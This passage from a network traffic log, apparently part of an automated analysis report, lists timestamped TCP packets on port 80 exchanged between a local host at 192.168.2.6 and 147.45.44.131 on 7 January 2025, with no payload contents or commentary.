                                                                          Jan 7, 2025 06:12:06.061743021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.061749935 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.061758041 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.061783075 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.061803102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.061815023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.061820030 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.061851978 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.061974049 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.061985016 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.061991930 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062000990 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062011957 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062019110 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062022924 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062032938 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062064886 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062135935 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062148094 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062158108 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062167883 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062171936 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062180042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062191963 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062196970 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062206984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062218904 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062228918 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062231064 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062239885 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062246084 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062271118 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062277079 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062480927 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062490940 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062503099 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062511921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062520027 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062522888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062536001 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062545061 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062546015 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062568903 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062592030 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062647104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062659025 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062669039 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062680006 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062690020 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062691927 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062700987 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062706947 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062712908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062725067 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062732935 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062767029 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062829018 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062839985 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.062872887 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.062975883 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.099561930 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.099575996 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.099586010 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.099596977 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.099606991 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.099617004 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.099627018 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.099638939 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.099694967 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.099720955 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.151559114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151571035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151587963 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151598930 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151609898 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151637077 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151634932 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.151648998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151659966 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151679993 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.151679993 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.151704073 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.151886940 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151952028 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151962996 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.151992083 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.151997089 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152008057 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152019024 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152035952 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152049065 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152070999 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152081966 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152091980 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152102947 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152107000 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152128935 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152199030 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152210951 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152228117 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152237892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152240038 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152249098 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152257919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152266026 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152267933 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152278900 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152287006 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152296066 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152303934 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152308941 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152318954 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152329922 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152340889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152342081 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152352095 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152358055 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152364016 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152394056 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152432919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152443886 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152453899 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152465105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152471066 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152476072 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152484894 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152510881 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152534962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152544022 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152554035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152565002 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152568102 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152576923 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152592897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152601957 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152602911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152621984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152623892 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152632952 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152643919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152657986 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152671099 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152712107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152720928 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152730942 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152741909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152753115 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152759075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152766943 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152770042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152787924 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152797937 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152800083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152812004 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152826071 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152853012 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152863979 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152873993 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152880907 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152884960 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152904034 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.152910948 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152921915 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.152947903 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153140068 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153151035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153161049 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153171062 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153179884 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153181076 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153198957 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153209925 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153212070 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153220892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153230906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153243065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153249025 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153253078 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153270006 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153275013 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153281927 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153289080 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153292894 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153305054 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153314114 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153315067 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153326035 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153337002 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153337955 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153353930 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153354883 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153364897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153386116 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153388977 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153398037 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153428078 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153517962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153528929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153539896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153551102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153559923 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153563976 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153572083 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153578997 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153597116 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153650045 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153660059 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153677940 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153687954 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153698921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153701067 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153708935 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153718948 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153723955 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153739929 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153748989 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153753996 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153760910 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153772116 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153783083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153789043 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153795004 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153805017 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153815985 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153816938 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153829098 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153877020 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153887033 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153898001 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.153907061 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153929949 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.153969049 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.191719055 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.191741943 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.191747904 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.191754103 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.191759109 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.191765070 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.191770077 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.191776037 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.191905975 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244173050 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244198084 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244213104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244230032 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244241953 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244252920 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244270086 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244278908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244290113 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244297028 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244301081 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244306087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244317055 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244328022 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244345903 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244355917 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244368076 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244415045 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244411945 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244429111 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244450092 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244467020 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244477034 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244483948 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244496107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244508028 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244520903 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244529009 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244538069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244541883 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244569063 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244617939 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244628906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244646072 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244657993 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244668007 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244678020 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244685888 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244692087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244695902 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244709969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244719028 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244720936 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244733095 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244738102 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244745016 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244760990 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244761944 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244772911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244784117 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244795084 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244802952 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244802952 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244806051 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244833946 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244844913 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244857073 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244890928 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244891882 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244906902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244919062 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244929075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244940042 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244955063 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244966030 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244966030 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.244985104 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.244997978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245011091 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245021105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245043993 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245049000 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245060921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245073080 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245076895 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245084047 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245090008 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245115042 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245131969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245147943 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245160103 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245187044 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245229959 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245242119 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245253086 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245265007 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245270014 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245290995 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245368004 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245381117 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245392084 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245409966 CET8049712147.45.44.131192.168.2.6
